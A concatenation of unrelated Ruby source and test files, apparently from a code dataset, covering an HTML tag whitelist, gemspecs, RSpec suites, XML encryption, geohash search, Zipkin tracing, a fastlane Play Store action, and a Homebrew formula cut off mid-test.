def v_align( text )
V_ALGN_VALS[text]
end
def textile_popup_help( name, windowW, windowH )
' <a target="_blank" href="http://hobix.com/textile/#' + helpvar + '" onclick="window.open(this.href, \'popupwindow\', \'width=' + windowW + ',height=' + windowH + ',scrollbars,resizable\'); return false;">' + name + '</a><br />'
end
# HTML cleansing stuff
BASIC_TAGS = {
'a' => ['href', 'title'],
'img' => ['src', 'alt', 'title'],
'br' => [],
'i' => nil,
'u' => nil,
'b' => nil,
'pre' => nil,
'kbd' => nil,
'code' => ['lang'],
'cite' => nil,
'strong' => nil,
'em' => nil,
'ins' => nil,
'sup' => nil,
'sub' => nil,
'del' => nil,
'table' => nil,
'tr' => nil,
'td' => ['colspan', 'rowspan'],
'th' => nil,
'ol' => nil,
'ul' => nil,
'li' => nil,
'p' => nil,
'h1' => nil,
'h2' => nil,
'h3' => nil,
'h4' => nil,
'h5' => nil,
'h6' => nil,
'blockquote' => ['cite']
}
def clean_html( text, tags = BASIC_TAGS )
text.gsub!( /<!\[CDATA\[/, '' )
text.gsub!( /<(\/*)(\w+)([^>]*)>/ ) do
raw = $~
tag = raw[2].downcase
if tags.has_key? tag
pcs = [tag]
tags[tag].each do |prop|
['"', "'", ''].each do |q|
q2 = ( q != '' ? q : '\s' )
if raw[3] =~ /#{prop}\s*=\s*#{q}([^#{q2}]+)#{q}/i
attrv = $1
next if prop == 'src' and attrv =~ %r{^(?!http)\w+:}
pcs << "#{prop}=\"#{$1.gsub('"', '\\"')}\""
break
end
end
end if tags[tag]
"<#{raw[1]}#{pcs.join " "}>"
else
" "
end
end
end
end
| 31.721977 | 237 | 0.447261 |
28220f7ecedc306f2dc5cf20b702c1253b93d22c | 1,296 | # -*- encoding: utf-8 -*-
# stub: jekyll-theme-architect 0.1.0 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-theme-architect".freeze
s.version = "0.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Jason Long".freeze, "GitHub, Inc.".freeze]
s.date = "2017-08-14"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/pages-themes/architect".freeze
s.licenses = ["CC0-1.0".freeze]
s.rubygems_version = "2.7.7".freeze
s.summary = "Architect is a Jekyll theme for GitHub Pages".freeze
s.installed_by_version = "2.7.7" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
end
| 37.028571 | 112 | 0.665895 |
4a3591bfdb3ec4ff1355e256c5eeaa410afcab12 | 1,516 | # frozen_string_literal: true
RSpec.describe YoutubeAudio::Format do
let(:response_raw) do
JSON.parse(
{ # url=mock&s=mock-signature&sp=sig
mimeType: 'audio/mp4',
approxDurationMs: '1000',
audioQuality: 'low',
url: 'url-mock'
}.to_json
)
end
subject { described_class.new(response_raw, script_player_url: 'mock') }
describe '#mime_type' do
it { expect(subject.mime_type).to eq('audio/mp4') }
end
describe '#approx_duration_ms' do
it { expect(subject.approx_duration_ms).to eq('1000') }
end
describe '#audio_quality' do
it { expect(subject.audio_quality).to eq('low') }
end
describe '#url' do
it { expect(subject.url).to eq('url-mock') }
it 'returns an url with signature' do
mock = instance_double(YoutubeAudio::UrlDecipher, decipher: 'decipher')
expect(subject).to receive(:cipher)
.twice
.and_return('url=mock&s=mock-signature&sp=sig')
expect(YoutubeAudio::UrlDecipher).to receive(:new)
.with('url=mock&s=mock-signature&sp=sig',
script_player_url: 'mock')
.and_return(mock)
expect(subject.url).to eq('decipher')
end
end
describe '#audio?' do
it 'returns true if the mime type is an audio' do
expect(subject.audio?).to eq(true)
end
it 'returns false if the mime type is not an audio' do
expect(subject).to receive(:mime_type).and_return('video/mp4')
expect(subject.audio?).to eq(false)
end
end
end
| 26.137931 | 77 | 0.64314 |
f70e6223224c2c24b86812da14abf08d69eebb6e | 1,953 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ::AcaEntities::Contracts::People::PersonReferenceContract, dbclean: :after_each do
let!(:required_params) do
{
hbx_id: '1234',
first_name: 'first name',
last_name: 'last name',
middle_name: 'middle name',
dob: Date.today,
gender: 'male',
ssn: nil
}
end
context 'success case' do
before do
@result = subject.call(required_params)
end
it 'should return success' do
expect(@result.success?).to be_truthy
end
it 'should not have any errors' do
expect(@result.errors.empty?).to be_truthy
end
end
context 'when gender is nil' do
before do
@result = subject.call(required_params.merge(gender: nil))
end
it 'should return success' do
expect(@result.success?).to be_truthy
end
it 'should not have any errors' do
expect(@result.errors.empty?).to be_truthy
end
end
context 'failure case' do
context 'missing required param' do
before do
@result = subject.call(required_params.reject { |k, _v| k == :gender })
end
it 'should return failure' do
expect(@result.failure?).to be_truthy
end
it 'should have any errors' do
expect(@result.errors.empty?).to be_falsy
end
it 'should return error message' do
expect(@result.errors.messages.first.text).to eq('is missing')
end
end
context 'with bad input data type' do
before do
@result = subject.call(required_params.merge(first_name: nil))
end
it 'should return failure' do
expect(@result.failure?).to be_truthy
end
it 'should have any errors' do
expect(@result.errors.empty?).to be_falsy
end
it 'should return error message' do
expect(@result.errors.messages.first.text).to eq('must be a string')
end
end
end
end
| 22.976471 | 97 | 0.630824 |
18c67f05ff86b914e9915ad151ba3ebf11592d1a | 139 | class AddAwsMediaKeyToRecordings < ActiveRecord::Migration[6.0]
def change
add_column :recordings, :aws_media_key, :string
end
end
| 23.166667 | 63 | 0.776978 |
aca0bb1d794ced4166b728ea52ff1583f960cd63 | 7,318 | require 'spec_helper'
describe ProjectsHelper do
describe "#project_status_css_class" do
it "returns appropriate class" do
expect(project_status_css_class("started")).to eq("active")
expect(project_status_css_class("failed")).to eq("danger")
expect(project_status_css_class("finished")).to eq("success")
end
end
describe "can_change_visibility_level?" do
let(:project) { create(:project, :repository) }
let(:user) { create(:project_member, :reporter, user: create(:user), project: project).user }
let(:fork_project) { Projects::ForkService.new(project, user).execute }
it "returns false if there are no appropriate permissions" do
allow(helper).to receive(:can?) { false }
expect(helper.can_change_visibility_level?(project, user)).to be_falsey
end
it "returns true if there are permissions and it is not fork" do
allow(helper).to receive(:can?) { true }
expect(helper.can_change_visibility_level?(project, user)).to be_truthy
end
context "forks" do
it "returns false if there are permissions and origin project is PRIVATE" do
allow(helper).to receive(:can?) { true }
project.update visibility_level: Gitlab::VisibilityLevel::PRIVATE
expect(helper.can_change_visibility_level?(fork_project, user)).to be_falsey
end
it "returns true if there are permissions and origin project is INTERNAL" do
allow(helper).to receive(:can?) { true }
project.update visibility_level: Gitlab::VisibilityLevel::INTERNAL
expect(helper.can_change_visibility_level?(fork_project, user)).to be_truthy
end
end
end
describe "readme_cache_key" do
let(:project) { create(:project) }
before do
helper.instance_variable_set(:@project, project)
end
it "returns a valid cach key" do
expect(helper.send(:readme_cache_key)).to eq("#{project.path_with_namespace}-#{project.commit.id}-readme")
end
it "returns a valid cache key if HEAD does not exist" do
allow(project).to receive(:commit) { nil }
expect(helper.send(:readme_cache_key)).to eq("#{project.path_with_namespace}-nil-readme")
end
end
describe 'link_to_member' do
let(:group) { create(:group) }
let(:project) { create(:empty_project, group: group) }
let(:user) { create(:user) }
describe 'using the default options' do
it 'returns an HTML link to the user' do
link = helper.link_to_member(project, user)
expect(link).to match(%r{/#{user.username}})
end
end
end
describe 'default_clone_protocol' do
context 'when user is not logged in and gitlab protocol is HTTP' do
it 'returns HTTP' do
allow(helper).to receive(:current_user).and_return(nil)
expect(helper.send(:default_clone_protocol)).to eq('http')
end
end
context 'when user is not logged in and gitlab protocol is HTTPS' do
it 'returns HTTPS' do
stub_config_setting(protocol: 'https')
allow(helper).to receive(:current_user).and_return(nil)
expect(helper.send(:default_clone_protocol)).to eq('https')
end
end
end
describe '#license_short_name' do
let(:project) { create(:empty_project) }
context 'when project.repository has a license_key' do
it 'returns the nickname of the license if present' do
allow(project.repository).to receive(:license_key).and_return('agpl-3.0')
expect(helper.license_short_name(project)).to eq('GNU AGPLv3')
end
it 'returns the name of the license if nickname is not present' do
allow(project.repository).to receive(:license_key).and_return('mit')
expect(helper.license_short_name(project)).to eq('MIT License')
end
end
context 'when project.repository has no license_key but a license_blob' do
it 'returns LICENSE' do
allow(project.repository).to receive(:license_key).and_return(nil)
expect(helper.license_short_name(project)).to eq('LICENSE')
end
end
end
describe '#sanitized_import_error' do
let(:project) { create(:project) }
before do
allow(project).to receive(:repository_storage_path).and_return('/base/repo/path')
end
it 'removes the repo path' do
repo = '/base/repo/path/namespace/test.git'
import_error = "Could not clone #{repo}\n"
expect(sanitize_repo_path(project, import_error)).to eq('Could not clone [REPOS PATH]/namespace/test.git')
end
end
describe '#last_push_event' do
let(:user) { double(:user, fork_of: nil) }
let(:project) { double(:project, id: 1) }
before do
allow(helper).to receive(:current_user).and_return(user)
helper.instance_variable_set(:@project, project)
end
context 'when there is no current_user' do
let(:user) { nil }
it 'returns nil' do
expect(helper.last_push_event).to eq(nil)
end
end
it 'returns recent push on the current project' do
event = double(:event)
expect(user).to receive(:recent_push).with([project.id]).and_return(event)
expect(helper.last_push_event).to eq(event)
end
context 'when current user has a fork of the current project' do
let(:fork) { double(:fork, id: 2) }
it 'returns recent push considering fork events' do
expect(user).to receive(:fork_of).with(project).and_return(fork)
event_on_fork = double(:event)
expect(user).to receive(:recent_push).with([project.id, fork.id]).and_return(event_on_fork)
expect(helper.last_push_event).to eq(event_on_fork)
end
end
end
describe "#project_feature_access_select" do
let(:project) { create(:empty_project, :public) }
let(:user) { create(:user) }
context "when project is internal or public" do
it "shows all options" do
helper.instance_variable_set(:@project, project)
result = helper.project_feature_access_select(:issues_access_level)
expect(result).to include("Disabled")
expect(result).to include("Only team members")
expect(result).to include("Everyone with access")
end
end
context "when project is private" do
before { project.update_attributes(visibility_level: Gitlab::VisibilityLevel::PRIVATE) }
it "shows only allowed options" do
helper.instance_variable_set(:@project, project)
result = helper.project_feature_access_select(:issues_access_level)
expect(result).to include("Disabled")
expect(result).to include("Only team members")
expect(result).not_to include("Everyone with access")
end
end
context "when project moves from public to private" do
before do
project.update_attributes(visibility_level: Gitlab::VisibilityLevel::PRIVATE)
end
it "shows the highest allowed level selected" do
helper.instance_variable_set(:@project, project)
result = helper.project_feature_access_select(:issues_access_level)
expect(result).to include("Disabled")
expect(result).to include("Only team members")
expect(result).not_to include("Everyone with access")
expect(result).to have_selector('option[selected]', text: "Only team members")
end
end
end
end
| 33.113122 | 112 | 0.680377 |
91321296f214d8946740f0763f4fc10ff8544ed5 | 925 | # frozen_string_literal: true
module CoEditPDF
# Policy to determine if an account can collaborate a particular pdf
class CollaborationRequestPolicy
def initialize(pdf, target_account, auth_scope = nil)
@pdf = pdf
@requestor_account = pdf.owner
@target_account = target_account
@auth_scope = auth_scope
@requestor = PdfPolicy.new(@requestor_account, @pdf, auth_scope)
@target = PdfPolicy.new(@target_account, @pdf, auth_scope)
end
def can_invite?
can_write? &&
(@requestor.can_add_collaborators? && @target.can_collaborate?)
end
def can_remove?
can_write? &&
(@requestor.can_remove_collaborators? && target_is_collaborator?)
end
private
def can_write?
@auth_scope ? @auth_scope.can_write?('pdf') : false
end
def target_is_collaborator?
@pdf.collaborators.include?(@target_account)
end
end
end
| 25.694444 | 73 | 0.685405 |
5de13b81e0b1f1b77dbb33735322cb6be5595434 | 1,766 | RSpec.feature "Partner management", type: :feature do
before do
sign_in(@user)
end
let!(:url_prefix) { "/#{@organization.to_param}" }
context "When a user views the index page" do
before(:each) do
@second = create(:partner, name: "Bcd")
@first = create(:partner, name: "Abc")
@third = create(:partner, name: "Cde")
visit url_prefix + "/partners"
end
scenario "the partner agency names are in alphabetical order" do
expect(page).to have_css("table tr", count: 4)
expect(page.find(:xpath, "//table/tbody/tr[1]/td[1]")).to have_content(@first.name)
expect(page.find(:xpath, "//table/tbody/tr[3]/td[1]")).to have_content(@third.name)
end
end
scenario "User can add a new partner" do
visit url_prefix + "/partners/new"
fill_in "Name", with: "Frank"
fill_in "E-mail", with: "[email protected]"
click_button "Save"
expect(page.find(".alert")).to have_content "added"
end
scenario "User creates a new partner with empty name" do
visit url_prefix + "/partners/new"
click_button "Save"
expect(page.find(".alert")).to have_content "didn't work"
end
scenario "User can update a partner" do
partner = create(:partner, name: "Frank")
visit url_prefix + "/partners/#{partner.id}/edit"
fill_in "Name", with: "Franklin"
click_button "Save"
expect(page.find(".alert")).to have_content "updated"
partner.reload
expect(partner.name).to eq("Franklin")
end
scenario "User updates a partner with empty name" do
partner = create(:partner, name: "Frank")
visit url_prefix + "/partners/#{partner.id}/edit"
fill_in "Name", with: ""
click_button "Save"
expect(page.find(".alert")).to have_content "didn't work"
end
end
| 30.982456 | 89 | 0.65402 |
622945431cc9f65b580927624208c9cd0cce0d5a | 1,430 | module Xmlenc
module Builder
class EncryptedData
include Xmlenc::Builder::ComplexTypes::EncryptedType
ALGORITHMS = {
'http://www.w3.org/2001/04/xmlenc#tripledes-cbc' => Algorithms::DES3CBC,
'http://www.w3.org/2001/04/xmlenc#aes128-cbc' => Algorithms::AESCBC[128],
'http://www.w3.org/2001/04/xmlenc#aes256-cbc' => Algorithms::AESCBC[256]
}
TYPES = {
'http://www.w3.org/2001/04/xmlenc#Element' => :element,
'http://www.w3.org/2001/04/xmlenc#Content' => :content,
}
tag "EncryptedData"
namespace "xenc"
attribute :id, String, tag: "Id"
attribute :type, String, tag: "Type"
def type
'http://www.w3.org/2001/04/xmlenc#Element'
end
def initialize(attributes = {})
super
self.id = SecureRandom.hex(5)
end
def encrypt(data)
encryptor = algorithm.setup
encrypted = encryptor.encrypt(data, node: encryption_method)
cipher_data.cipher_value = Base64.encode64(encrypted)
encrypted_key = EncryptedKey.new(data: encryptor.key)
encrypted_key.add_data_reference(id)
encrypted_key
end
private
def algorithm
algorithm = encryption_method.algorithm
ALGORITHMS[algorithm] ||
raise(UnsupportedError.new("Unsupported encryption method #{algorithm}"))
end
end
end
end
| 28.039216 | 86 | 0.613986 |
26f3bfbcbc84fc1e843f4aa7fc99ad5190aa62be | 1,250 | # frozen_string_literal: true
require "active_record_unit"
class RelationCacheTest < ActionView::TestCase
tests ActionView::Helpers::CacheHelper
def setup
super
view_paths = ActionController::Base.view_paths
lookup_context = ActionView::LookupContext.new(view_paths, {}, ["test"])
@view_renderer = ActionView::Renderer.new(lookup_context)
@virtual_path = "path"
@current_template = lookup_context.find "test/hello_world"
controller.cache_store = ActiveSupport::Cache::MemoryStore.new
end
def test_cache_relation_other
assert_queries(1) do
cache(Project.all) { concat("Hello World") }
end
assert_equal "Hello World", controller.cache_store.read("views/test/hello_world:fa9482a68ce25bf7589b8eddad72f736/projects-#{Project.count}")
end
def view_cache_dependencies; []; end
def assert_queries(num)
ActiveRecord::Base.connection.materialize_transactions
count = 0
ActiveSupport::Notifications.subscribe("sql.active_record") do |_name, _start, _finish, _id, payload|
count += 1 unless ["SCHEMA", "TRANSACTION"].include? payload[:name]
end
result = yield
assert_equal num, count, "#{count} instead of #{num} queries were executed."
result
end
end
| 30.487805 | 144 | 0.732 |
ed4caad43e912a7183de6edc2d470d84f1259d7f | 6,043 | require 'spec_helper'
RSpec.describe NgrokAPI::Services::AgentIngressesClient do
let(:base_url) { 'https://api.ngrok.com' }
let(:path) { '/agent_ingresses' }
let(:not_found) do
NgrokAPI::Errors::NotFoundError.new(response: agent_ingress_result)
end
before(:each) do
@client = class_double("HttpClient")
@agent_ingresses_client = NgrokAPI::Services::AgentIngressesClient.new(client: @client)
end
describe "#create" do
it "will make a post request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses'
replacements = {
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
data[:domain] = "New domain"
expect(@client).to receive(:post).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.create(
description: "New description",
metadata: "New metadata",
domain: "New domain"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
end
end
describe "#create!" do
it "will make a post request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses'
replacements = {
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
data[:domain] = "New domain"
expect(@client).to receive(:post).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.create(
description: "New description",
metadata: "New metadata",
domain: "New domain"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
# expect(result.id).to eq(agent_ingress_result["id"])
end
end
describe "#delete" do
it "will make a delete request" do
path = '/agent_ingresses/%{id}'
replacements = {
id: api_key_result["id"],
}
expect(@client).to receive(:delete).with(path % replacements).and_return(nil)
@agent_ingresses_client.delete(
id: api_key_result["id"]
)
end
end
describe "#delete!" do
it "will make a delete request" do
path = '/agent_ingresses/%{id}'
replacements = {
id: api_key_result["id"],
}
expect(@client).to receive(:delete).with(path % replacements, danger: true).and_return(nil)
@agent_ingresses_client.delete!(
id: api_key_result["id"]
)
end
it "will make a delete request and return NotFoundError if 404" do
path = '/agent_ingresses/%{id}'
replacements = {
id: api_key_result["id"],
}
expect do
expect(@client).to receive(:delete).with(path % replacements, danger: true).
and_raise(NgrokAPI::Errors::NotFoundError)
result = @agent_ingresses_client.delete!(
id: api_key_result["id"]
)
expect(result).to be nil
end.to raise_error(NgrokAPI::Errors::NotFoundError)
end
end
describe "#get" do
it "will make a get request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
expect(@client).to receive(:get).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.get(
id: agent_ingress_result["id"]
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
end
end
describe "#get!" do
it "will make a get request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
expect(@client).to receive(:get).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.get(
id: agent_ingress_result["id"]
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
# expect(result.id).to eq(agent_ingress_result["id"])
end
end
describe "#list" do
it "will make a call to list (a GET request) and return a NgrokAPI::Models::Listable" do
expect(@client).to receive(:list).
and_return(agent_ingress_results)
url = base_url + path + "?before_id=" + api_key_result["id"] + "&limit=1"
result = @agent_ingresses_client.list(url: url)
expect(result.class).to eq(NgrokAPI::Models::Listable)
end
end
describe "#update" do
it "will make a patch request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
expect(@client).to receive(:patch).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.update(
id: agent_ingress_result["id"],
description: "New description",
metadata: "New metadata"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
end
end
describe "#update!" do
it "will make a patch request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
expect(@client).to receive(:patch).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.update(
id: agent_ingress_result["id"],
description: "New description",
metadata: "New metadata"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
# expect(result.id).to eq(agent_ingress_result["id"])
end
end
end
| 33.38674 | 97 | 0.634619 |
e2c52cf5aa3dcc5b5878b09dd872bed1f1755ecf | 190 | #!/usr/bin/ruby
# -*- coding: UTF-8 -*-
class Example
VAR1 = 100
VAR2 = 200
def show
puts "第一个常量的值为 #{VAR1}"
puts "第二个常量的值为 #{VAR2}"
end
end
# 创建对象
object=Example.new()
object.show | 12.666667 | 25 | 0.636842 |
ede61aaa3b68d4ad1b56cd23d428d722d0e99030 | 134 | class AddSeniorToUsers < ActiveRecord::Migration[5.0]
def change
add_column :users, :senior, :boolean, default: false
end
end
| 22.333333 | 56 | 0.738806 |
f8a9880ff5522a683925ff183ab7fbc6060d6546 | 577 | class CreateIteasykitIteasykitPlants < ActiveRecord::Migration[5.2]
def change
create_table :iteasykit_plants do |t|
t.boolean :active
t.timestamps
end
reversible do |dir|
dir.up do
Iteasykit::Plant.create_translation_table! :site => :string, :phone => :string, :address_map => :string, :geodanniye => :string,
:country => :string, :email => :string, :cordinates => :string
end
dir.down do
Iteasykit::Plant.drop_translation_table!
end
end
end
end
| 26.227273 | 136 | 0.589255 |
01110e9056a766cd3c9229731abcbd905e405273 | 1,184 | begin
require 'geohash'
rescue LoadError => e
require 'pr_geohash'
end
module Sunspot
module Query
class Geo
MAX_PRECISION = 12
DEFAULT_PRECISION = 7
DEFAULT_PRECISION_FACTOR = 16.0
def initialize(field, lat, lng, options)
@field, @options = field, options
@geohash = GeoHash.encode(lat.to_f, lng.to_f, MAX_PRECISION)
end
def to_params
{ :q => to_boolean_query }
end
def to_subquery
"(#{to_boolean_query})"
end
private
def to_boolean_query
queries = []
MAX_PRECISION.downto(precision) do |i|
star = i == MAX_PRECISION ? '' : '*'
precision_boost = Util.format_float(
boost * precision_factor ** (i-MAX_PRECISION).to_f, 3)
queries << "#{@field.indexed_name}:#{@geohash[0, i]}#{star}^#{precision_boost}"
end
queries.join(' OR ')
end
def precision
@options[:precision] || DEFAULT_PRECISION
end
def precision_factor
@options[:precision_factor] || DEFAULT_PRECISION_FACTOR
end
def boost
@options[:boost] || 1.0
end
end
end
end
| 21.925926 | 89 | 0.584459 |
f7d49acdbc6d6392fede05844c4b1ddccfe07c5f | 490 | # frozen_string_literal: true
module QueueHelper
private
def poll(queue, success = true)
test_order = []
queue.poll do |test|
yield test if block_given?
test_order << test
failed = !(success.respond_to?(:call) ? success.call(test) : success)
if failed
queue.report_failure!
queue.requeue(test) || queue.acknowledge(test)
else
queue.report_success!
queue.acknowledge(test)
end
end
test_order
end
end
| 22.272727 | 75 | 0.632653 |
e9ee2c86d0f28e46915dd82814ca363c128cda3f | 1,388 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'openhouse/version'
Gem::Specification.new do |spec|
spec.name = 'openhouse'
spec.version = OpenHouse::VERSION
spec.date = '2017-06-20'
spec.authors = ['Eugenio Bruno']
spec.email = ['[email protected]']
spec.summary = 'OpenHouse simplifies implementing the Visitor design pattern.'
spec.homepage = 'https://github.com/eugeniobruno/openhouse'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = 'bin'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.extra_rdoc_files = %w[LICENSE.txt README.md CODE_OF_CONDUCT.md CHANGELOG.md]
spec.required_ruby_version = '>= 2.0.0'
spec.add_development_dependency 'bundler', '~> 1.15'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'minitest', '~> 5.0'
spec.add_development_dependency 'minitest-bender', '~> 0.0', '>= 0.0.2'
spec.add_development_dependency 'simplecov', '~> 0.14'
spec.add_development_dependency 'coveralls', '~> 0.8'
spec.add_development_dependency 'pry-byebug', '~> 3.4'
end
| 37.513514 | 83 | 0.678674 |
91719392e32204270c4b7d50eca587d705c63325 | 1,461 | require 'faraday'
module Trace
# This class is a base for tracers sending information to Zipkin.
# It knows about zipkin types of annotations and send traces when the server
# is done with its request
# Traces dealing with zipkin should inherit from this class and implement the
# flush! method which actually sends the information
class ZipkinTracerBase
def initialize(options={})
@options = options
reset
end
def with_new_span(trace_id, name)
span = start_span(trace_id, name)
result = yield span
end_span(span)
result
end
def end_span(span)
span.close
# If in a thread not handling incoming http requests, it will not have Kind::SERVER, so the span
# will never be flushed and will cause memory leak.
# If no parent span, then current span needs to flush when it ends.
if !span.has_parent_span? || span.kind == Trace::Span::Kind::SERVER
flush!
reset
end
end
def start_span(trace_id, name)
span = Span.new(name, trace_id)
span.local_endpoint = Trace.default_endpoint
store_span(trace_id, span)
span
end
def flush!
raise "not implemented"
end
private
THREAD_KEY = :zipkin_spans
def spans
Thread.current[THREAD_KEY] ||= []
end
def store_span(id, span)
spans.push(span)
end
def reset
Thread.current[THREAD_KEY] = []
end
end
end
| 23.190476 | 102 | 0.654346 |
396ef0909cf035e915e40472948806ff86031c30 | 5,680 | module Fastlane
module Actions
class GetManagedPlayStorePublishingRightsAction < Action
def self.run(params)
unless params[:json_key] || params[:json_key_data]
UI.important("To not be asked about this value, you can specify it using 'json_key'")
json_key_path = UI.input("The service account json file used to authenticate with Google: ")
json_key_path = File.expand_path(json_key_path)
UI.user_error!("Could not find service account json file at path '#{json_key_path}'") unless File.exist?(json_key_path)
params[:json_key] = json_key_path
end
FastlaneCore::PrintTable.print_values(
config: params,
mask_keys: [:json_key_data],
title: "Summary for get_managed_play_store_publishing_rights"
)
if (keyfile = params[:json_key])
json_key_data = File.open(keyfile, 'rb').read
else
json_key_data = params[:json_key_data]
end
# Login
credentials = JSON.parse(json_key_data)
callback_uri = 'https://fastlane.github.io/managed_google_play-callback/callback.html'
require 'addressable/uri'
continueUrl = Addressable::URI.encode(callback_uri)
uri = "https://play.google.com/apps/publish/delegatePrivateApp?service_account=#{credentials['client_email']}&continueUrl=#{continueUrl}"
UI.message("To obtain publishing rights for custom apps on Managed Play Store, open the following URL and log in:")
UI.message("")
UI.important(uri)
UI.message("([Cmd/Ctrl] + [Left click] lets you open this URL in many consoles/terminals/shells)")
UI.message("")
UI.message("After successful login you will be redirected to a page which outputs some information that is required for usage of the `create_app_on_managed_play_store` action.")
return uri
end
def self.description
"Obtain publishing rights for custom apps on Managed Google Play Store"
end
def self.authors
["janpio"]
end
def self.return_value
"An URI to obtain publishing rights for custom apps on Managed Play Store"
end
def self.details
[
'If you haven\'t done so before, start by following the first two steps of Googles ["Get started with custom app publishing"](https://developers.google.com/android/work/play/custom-app-api/get-started) -> ["Preliminary setup"](https://developers.google.com/android/work/play/custom-app-api/get-started#preliminary_setup) instructions:',
'"[Enable the Google Play Custom App Publishing API](https://developers.google.com/android/work/play/custom-app-api/get-started#enable_the_google_play_custom_app_publishing_api)" and "[Create a service account](https://developers.google.com/android/work/play/custom-app-api/get-started#create_a_service_account)".',
'You need the "service account\'s private key file" to continue.',
'Run the action and supply the "private key file" to it as the `json_key` parameter. The command will output a URL to visit. After logging in you are redirected to a page that outputs your "Developer Account ID" - take note of that, you will need it to be able to use [`create_app_on_managed_play_store`](https://docs.fastlane.tools/actions/create_app_on_managed_play_store/).'
].join("\n")
end
def self.example_code
[
'get_managed_play_store_publishing_rights(
json_key: "path/to/your/json/key/file"
)
# it is probably easier to execute this action directly in the command line:
# $ fastlane run get_managed_play_store_publishing_rights'
]
end
def self.available_options
[
FastlaneCore::ConfigItem.new(
key: :json_key,
env_name: "SUPPLY_JSON_KEY",
short_option: "-j",
conflicting_options: [:json_key_data],
optional: true, # optional until it is possible specify either json_key OR json_key_data are required
description: "The path to a file containing service account JSON, used to authenticate with Google",
code_gen_sensitive: true,
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:json_key_file),
default_value_dynamic: true,
verify_block: proc do |value|
UI.user_error!("Could not find service account json file at path '#{File.expand_path(value)}'") unless File.exist?(File.expand_path(value))
UI.user_error!("'#{value}' doesn't seem to be a JSON file") unless FastlaneCore::Helper.json_file?(File.expand_path(value))
end
),
FastlaneCore::ConfigItem.new(
key: :json_key_data,
env_name: "SUPPLY_JSON_KEY_DATA",
short_option: "-c",
conflicting_options: [:json_key],
optional: true,
description: "The raw service account JSON data used to authenticate with Google",
code_gen_sensitive: true,
default_value: CredentialsManager::AppfileConfig.try_fetch_value(:json_key_data_raw),
default_value_dynamic: true,
verify_block: proc do |value|
begin
JSON.parse(value)
rescue JSON::ParserError
UI.user_error!("Could not parse service account json: JSON::ParseError")
end
end
)
]
end
def self.is_supported?(platform)
[:android].include?(platform)
end
def self.category
:misc
end
end
end
end
| 46.178862 | 387 | 0.657394 |
acf575e24e5b42a2183e4fedaa24320e314093e3 | 199 | # frozen_string_literal: true
module Emails
class CreateService < ::Emails::BaseService
def execute(extra_params = {})
@user.emails.create(@params.merge(extra_params))
end
end
end
| 19.9 | 54 | 0.713568 |
0129b237274c822c89b4c07980f0716baf33b0aa | 209 | class DebugAction < ActionFilter
def initialize(tags=nil, descs=nil)
super
require 'rubinius/debugger'
end
def before(state)
Rubinius::Debugger.start if self === state.description
end
end
| 19 | 58 | 0.717703 |
1a7994fd3bf72ab6946ab6df3b4249f2bc5957ce | 709 | require "language/node"
class Marked < Formula
desc "Markdown parser and compiler built for speed"
homepage "https://marked.js.org/"
url "https://registry.npmjs.org/marked/-/marked-4.0.2.tgz"
sha256 "01905d4e1d509fe3d0a181dfa6becfb0b8bff804d8470ce9a46c414fd8ffd089"
license "MIT"
bottle do
sha256 cellar: :any_skip_relocation, all: "45b5e582505b94426abe2f03e7c4801c395435df963d7ad05fb69dcb82ff05b9"
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
